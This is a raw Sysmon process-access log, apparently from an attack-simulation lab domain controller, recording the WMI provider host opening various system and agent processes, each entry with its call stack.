16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 